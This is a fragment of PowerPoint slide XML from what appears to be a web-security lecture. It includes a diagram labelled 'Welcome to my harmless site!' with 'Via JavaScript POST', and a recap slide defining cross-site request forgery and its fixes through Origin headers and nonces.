                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>COMMENT!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173305"/>
            <a:ext cx="2413000" cy="779780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1809750" h="584835">
                <a:moveTo>
                  <a:pt x="1809750" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173305"/>
            <a:ext cx="2413000" cy="688372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44873" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2507"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="353"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2507"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1600115"/>
            <a:ext cx="4978400" cy="1443567"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3876378" y="2099665"/>
            <a:ext cx="3837093" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>harmless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site!</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>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9" name="object 29"/>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30" name="object 30"/>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31" name="object 31"/>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32" name="object 32"/>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33" name="object 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4218585"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3163938"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3163938"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="3943349"/>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6" name="object 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5257801"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>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37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556001" y="1701733"/>
            <a:ext cx="3589020" cy="321520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1F1F1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="122764">
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-67" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type="hidden“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-60" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs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5168393" y="450638"/>
            <a:ext cx="1856740" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-100" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>ap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1502663"/>
            <a:ext cx="10392833" cy="4461970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CSRF:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:lnSpc>
                <a:spcPts val="3840"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="927"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>forces </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execute </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unwanted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>actions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-880" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>he/she</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>currently</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>authenticated.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="85511" indent="-458035">
              <a:lnSpc>
                <a:spcPts val="3840"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Caused</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>includes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-880" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nonces</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626518">
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="107" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Origin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>supported</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>older</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
